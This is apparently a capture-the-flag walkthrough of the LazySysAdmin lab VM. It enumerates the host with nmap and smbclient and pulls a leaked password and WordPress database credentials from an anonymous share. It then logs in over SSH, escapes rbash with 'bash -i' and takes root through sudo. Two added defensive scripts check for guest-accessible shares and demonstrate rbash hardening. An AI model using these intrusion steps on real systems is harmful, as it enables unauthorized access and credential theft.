We start off with an nmap scan of the remote host.
root@ubuntu:~# nmap -Pn -sS -sV -sC -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-11 19:30 MDT
Nmap scan report for raven.local (192.168.56.101)
Host is up (0.00098s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.56.1
|_  error: Closing link: (nmap@192.168.56.1) [Client exited]
MAC Address: 08:00:27:1D:69:9D (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -6h00m01s, deviation: 0s, median: -6h00m01s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-10-12T05:30:43+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-11 13:30:43
|_  start_date: 1600-12-31 17:00:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.19 seconds
root@ubuntu:~#
Here we have an HTTP server running on the remote host, and a robots.txt exists. nmap provides us with the entries of the robots.txt for easy access.
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
We ran dirb against the website and found some interesting directories.
http://192.168.56.101/info.php
http://192.168.56.101/phpmyadmin/
If we look at http://192.168.56.101/info.php it gives us a lot of useful information, like the kernel version and other PHP-related details.
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686
PHP/5.5.9-1ubuntu4.22
mysql 5.5.57
_SERVER["DOCUMENT_ROOT"]   /var/www/html
allow_url_fopen            On
allow_url_include          Off
open_basedir               no value
The site is running WordPress 4.8.1, which isn't vulnerable to any exploits according to searchsploit, so I move on to try and brute force the admin login for WordPress.
[+] admin | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
I tried to brute force the admin login of WordPress with wpscan, but it didn't pan out. So now I moved on to SMB enumeration.
SMB Enumeration
If we look at the results of the nmap scan we can see the remote host is serving up shares.
Host script results:
|_clock-skew: mean: -6h00m01s, deviation: 0s, median: -6h00m01s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-10-12T05:30:43+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-11 13:30:43
|_  start_date: 1600-12-31 17:00:04
We'll start off using smbclient to see what we can do.
root@ubuntu:~# smbclient -L //192.168.56.101 -N
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAZYSYSADMIN
root@ubuntu:~#
We can see three shares are present, but the share 'share$' looks interesting. Let's try to connect to the share with no password.
root@ubuntu:~# smbclient -N //192.168.56.101/share$
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 15 05:05:52 2017
  ..                                  D        0  Mon Aug 14 06:34:47 2017
  wordpress                           D        0  Tue Aug 15 05:21:08 2017
  Backnode_files                      D        0  Mon Aug 14 06:08:26 2017
  wp                                  D        0  Tue Aug 15 04:51:23 2017
  deets.txt                           N      139  Mon Aug 14 06:20:05 2017
  robots.txt                          N       92  Mon Aug 14 06:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 06:39:56 2017
  apache                              D        0  Mon Aug 14 06:35:19 2017
  index.html                          N    36072  Sat Aug  5 23:02:15 2017
  info.php                            N       20  Tue Aug 15 04:55:19 2017
  test                                D        0  Mon Aug 14 06:35:10 2017
  old                                 D        0  Mon Aug 14 06:35:13 2017

		3029776 blocks of size 1024. 1435904 blocks available
smb: \>
It drops us to the smb prompt, meaning we can access the share anonymously. It looks like the share is the HTTP document root. There are some interesting files like deets.txt and todolist.txt; we will download both of these to our local box.
get deets.txt
getting file \deets.txt of size 139 as deets.txt (8.0 KiloBytes/sec) (average 8.0 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (4.5 KiloBytes/sec) (average 6.3 KiloBytes/sec)
smb: \>

deets.txt:
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

todolist.txt:
Prevent users from being able to view to web root using the local file browser

Another file I would like to get is the wp-config.php file, to read the database user and password.
smb: \> cd wordpress
smb: \wordpress\> get wp-config.php
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (190.3 KiloBytes/sec) (average 60.5 KiloBytes/sec)
smb: \wordpress\>

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
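As an added example that is not part of the original write-up, here is a check for the root cause of this finding: a Samba share that allows guest access and exports the web document root. The smb.conf it scans is constructed to resemble the exposure on this box; everything in it other than the share$ name and the /var/www/html path is an assumption.

```shell
#!/bin/sh
# Added example, not part of the original write-up: flag Samba shares that can
# be read without credentials and that export the web document root, the
# combination that let `smbclient -N` pull wp-config.php from share$ above.
# SAMPLE_SMB_CONF is constructed to mirror that exposure; it is not the VM's
# real smb.conf.

SAMPLE_SMB_CONF='[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   guest ok = no

[share$]
   comment = Sumshare
   path = /var/www/html
   guest ok = yes
   read only = no
'

# guest_shares_under CONF WEBROOT
# Prints "name path" for each share in CONF that allows guest access
# ("guest ok = yes" or its alias "public = yes") and whose path is at or
# below WEBROOT. A section header resets the per-share state.
guest_shares_under() {
    printf '%s\n' "$1" | awk -v root="$2" '
        function report() {
            if (name != "" && guest == "yes" && index(path, root) == 1) print name, path
        }
        /^[ \t]*\[/ {
            report()
            gsub(/^[ \t]*\[|\][ \t]*$/, "")
            name = $0; path = ""; guest = "no"; next
        }
        /=/ {
            eq = index($0, "=")
            key = substr($0, 1, eq - 1); val = substr($0, eq + 1)
            gsub(/^[ \t]+|[ \t]+$/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", val)
            if (key == "path") path = val
            if ((key == "guest ok" || key == "public") && val == "yes") guest = "yes"
        }
        END { report() }'
}

# Any line printed here is a share to fix with `guest ok = no` or by
# moving it off the web root.
guest_shares_under "$SAMPLE_SMB_CONF" /var/www
```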
Now that we have a database user and password, we can go back and try to log in to phpMyAdmin and run queries that way.
We logged in successfully; now let's search the wp_users table for the logins to the blog.
It looks like we don't have permission to run the SELECT query against the wordpress database.
If we go back and take a look at the clues we found earlier, we see that we have a password to some account on the server. My first instinct was to check SSH to see if maybe that was the user's password. But we do not have a valid username yet. If we go back again to the blog running on the server we see this:
"My name is togie". Perhaps the username for the SSH login is togie; we fire up ssh and check.
root@ubuntu:~# ssh togie@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
##################################################################################################
#                                  Welcome to Web_TR1                                            #
#                       All connections are monitored and recorded                               #
#              Disconnect IMMEDIATELY if you are not an authorized user!                         #
##################################################################################################
togie@192.168.56.101's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information disabled due to load higher than 1.0

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$
It worked! Great, now we have shell access to the server; let's run a few commands and see what we can find.
togie@LazySysAdmin:~$ cd ..
-rbash: cd: restricted
togie@LazySysAdmin:~$ echo $SHELL
/bin/rbash
togie@LazySysAdmin:~$
We are in a restricted environment. What we need to do is break out of this rbash shell into a regular bash shell. rbash won't let us run any command whose name contains a '/', but 'bash' itself is on the PATH, so running 'bash -i' starts an unrestricted shell; changing directories afterwards confirms that it worked.
togie@LazySysAdmin:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
togie@LazySysAdmin:~$ bash -i
togie@LazySysAdmin:~$ cd ..
togie@LazySysAdmin:/home$
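As an added example (not part of the original write-up), this script reproduces the escape above under a restricted bash and shows the fix: an rbash account whose PATH exposes only a private directory of approved commands, so the name 'bash' no longer resolves. It assumes bash is installed on the host running it and that `bash -r` behaves like rbash.

```shell
#!/bin/sh
# Added example, not from the original write-up: why `bash -i` escapes the
# rbash account on LazySysAdmin, and how a restricted PATH closes the hole.
# Assumes bash is installed; `bash -r` behaves the same as invoking rbash.

BASH_BIN=$(command -v bash)

# Run one command line under restricted bash with the given PATH exported.
# Output is discarded; the exit status tells whether the command ran.
rbash_try() {
    path="$1"; shift
    PATH="$path" "$BASH_BIN" -r -c "$*" >/dev/null 2>&1
}

# The PATH togie had on the box: every system bin directory, so the name
# "bash" resolves even though command names containing '/' are blocked.
# The directory holding bash is prepended so the demo also works on hosts
# that keep bash somewhere other than /bin.
WEAK_PATH="$(dirname "$BASH_BIN"):/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"

# Hardened layout: a private directory holding only symlinks to the commands
# the restricted user may run, used as the sole PATH entry.
make_locked_path() {
    dir=$(mktemp -d)
    for cmd in ls cat; do
        ln -s "$(command -v "$cmd")" "$dir/$cmd"
    done
    printf '%s\n' "$dir"
}

# Human-readable report of one attempt.
show() {
    if rbash_try "$1" "$2"; then echo "  allowed: $2"; else echo "  blocked: $2"; fi
}

locked=$(make_locked_path)
echo "rbash with the box's PATH:"
show "$WEAK_PATH" 'cd ..'                     # blocked: cd is disabled in rbash
show "$WEAK_PATH" 'bash -c "cd .. && pwd"'    # allowed: unrestricted child shell
echo "rbash with PATH=$locked:"
show "$locked" 'ls'                           # allowed: whitelisted command
show "$locked" 'bash -c "cd .. && pwd"'       # blocked: bash is not on PATH
rm -rf "$locked"
```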
Now that we have broken out of the restricted shell, it's time to check sudo and see what privileges, if any, the user togie has.
togie@LazySysAdmin:/home$ sudo -l
[sudo] password for togie:
Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
togie@LazySysAdmin:~$ sudo -s
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~#
We have all privileges and a root shell.